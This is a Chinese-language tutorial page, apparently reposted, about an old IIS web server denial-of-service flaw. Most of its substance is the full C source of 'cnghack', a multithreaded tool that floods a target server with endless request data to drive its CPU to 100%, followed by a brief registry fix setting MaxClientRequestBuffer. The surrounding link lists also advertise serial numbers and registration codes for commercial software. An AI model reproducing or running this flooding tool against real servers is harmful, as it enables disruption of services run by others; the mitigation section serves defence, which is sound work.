- 1PS提示:因為圖層已鎖定,無法編輯圖層的處理方法
- 2Adobe Illustrator CS5 序列號大全
- 3picacg蘋果版怎么找不到|picacg ios版是不是下架了介紹
- 4ACDsee注冊碼免費分享(含ACDsee18、ACDsee10等版本)
- 5蘋果iphone自動時間不準確的多種校正方法
- 6PDF瀏覽器能看3D文件嗎?PDF瀏覽器看3D文件圖文詳細教程
- 7Potato(馬鈴薯聊天)怎么注冊不了|Potato不能注冊處理方法介紹
- 8Potato(土豆聊天)怎么換頭像|Potato app更改頭像方法介紹
- 9ipad版office如何激活? office365激活的圖文說明教程
- 10最新的Adobe Illustrator CS4序列號大全
- 11Mac怎么通過設置VPN來登錄youtube等國外網站
- 12眼萌app怎么色弱測試 眼萌app色弱測試圖文說明教程
[摘要]17 IIS web server DOS 漏洞描述: 默認情況下,IIS容易被拒絕服務攻擊。如果注冊表中有一個叫 "MaxClientRequestBuffer" 的鍵未被創建,針對這種NT系 統的攻擊通常能奏效。 "MaxClientRequestBuffer&q...
17 IIS web server DOS
漏洞描述:
默認情況下,IIS容易被拒絕服務攻擊。如果注冊表中有一個叫 "MaxClientRequestBuffer" 的鍵未被創建,針對這種NT系
統的攻擊通常能奏效。 "MaxClientRequestBuffer" 這個鍵用于設置IIS允許接受的輸入量。如果 "MaxClientRequestBuffer"
設置為256(bytes),則攻擊者通過輸入大量的字符請求IIS將被限制在256字節以內。而系統的缺省設置對此不加限制,因此,利用
下面的程序。可以很容易地對IIS server實行DOS攻擊:
#include <stdio.h>
#include <windows.h>
#define MAX_THREAD 666
void cng();
char *server;
char *buffer;
int port;
int counter = 0;
int current_threads = 0;
int main(int argc, char **argv)
{
WORD tequila;
WSADATA data;
int p;
DWORD tid;
HANDLE hThread[2000];
//This code is as is and sucks as it is. Won't exit correctly and a lot
of other fun things.
//That I didn't want to take the time to do. So just ctrl+c out of the
code.
//Load up cnghack.exe 3 times for charm.
printf("CNG IIS DoS.\[email protected]\nhttp://www.eeye.com\n\"For my
beloved.\"\n");
if(argc<2){
printf("Usage: %s [server] [port]\n",argv[0]);
exit(1);
}
buffer=malloc(17500);
memset( buffer, 'A', strlen(buffer));
server=argv[1];
port=atoi(argv[2]);
tequila = MAKEWORD( 1, 1 );
printf("Attempting to start winsock... ");
if( (WSAStartup(tequila, &data)) !=0 ){
printf("failed to start winsock.\n");
exit(1);
}
else{
printf("started winsock.\n\n");
}
counter = 0;
for(p = 0 ; p < MAX_THREAD ; ++p ){
hThread[counter] = CreateThread(0,
0,
(LPTHREAD_START_ROUTINE) cng,
( void * )++counter,
0,
&tid);
}
Sleep(250);
while( current_threads )
Sleep(250);
counter = 0;
printf("Terminated Threads.\n");
while (counter < MAX_THREAD)
{
TerminateThread( hThread[counter], 0 );
++counter;
}
WSACleanup();
return 0;
}
void cng()
{
int SockFD=0, p;
struct sockaddr_in DstSAin;
char GETKILLED[]="GET / HTTP/\r\n";
int die=1;
printf("Entered CNG\n");
++current_threads;
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons((u_short)port);
DstSAin.sin_addr.s_addr=inet_addr( server );
if((SockFD = socket(AF_INET, SOCK_STREAM, 0)) < 0){
printf("Failed to create socket\n");
--current_threads;
return;
}
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
p=send(SockFD,GETKILLED,strlen(GETKILLED),0);
printf("Step 1: %i\n", p);
for(;;){
p=send(SockFD,buffer,strlen(buffer),0);
printf("P: %i\n", p);
//put in some code to check if send = -1 more then X times we drop
the loop and exit the thread
//bla bla bla i love the dirtiness of concept code.
}
}
--current_threads;
printf("Exited CNG\n");
return;
}
cnghack.c works by doing the following:
Connects to example.com
Sends: GET / HTTP/[return][buffer]
Where:
[return] is just an \r\n
[buffer] is a never ending stream of A's
攻擊結果將導致NT系統的CPU占用率達到 100%
解決方案
運行Regedt32.exe
在:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\w3svc\parameters
增加一個值:
Value Name: MaxClientRequestBuffer
Data Type: REG_DWORD
設置為十進制
具體數值設置為你想設定的IIS允許接受的URL最大長度。
CNNS的設置為256
(出處:熱點網絡)
推薦資訊 總人氣榜
最新教程 本月人氣
- 1從VB 6.0到VB.NET的轉換(1)
- 2設計模式之Chain of Responsibility
- 3.net的reflection (1)
- 4在GD中輸出漢字的函數的改進
- 5在GD中輸出漢字的函數的改進
- 6如何充分擴充VB技巧
- 7如何在VB中完成繪圖區的大10字光標
- 8轉貼:開發大型PHP項目的方法(5)
- 9已經寫好了同步規范文檔,可惜這里無法貼圖,就發一小段
- 10使用WSE 加密SOAP報文(6
- 11.NET語言的選擇
- 12如何設置對VB數據庫連接的動態路徑
- 1uc瀏覽器去廣告圖文說明教程:uc瀏覽器廣告過濾技巧使用方法_綠茶安卓網
- 2字符串根據多個字符進行分割的一種方法
- 3使用c#制作容易的留言板(1)
- 4華為p7移動版什么時候上市?華為p7手機移動版上市時間
- 5聯想黃金斗士s8預約圖文說明教程(附聯想s8預約網址)
- 6聯想黃金斗士s8加持版與規范版的區別有哪一些?s8加持版/規范版區別
- 7陌陌如何舉報?陌陌舉報好友圖文說明教程_綠茶安卓網
- 8陌陌群聊如何@別人?陌陌群聊@別人方法_綠茶安卓網
- 93星s4手勢感應如何用?3星Galaxy s4手勢感應視頻圖文說明教程
- 10lumia920 Amber更新新增技巧演示視頻
- 11用php寫類似microsoft的挖地雷游戲
- 12我對XSL的理解
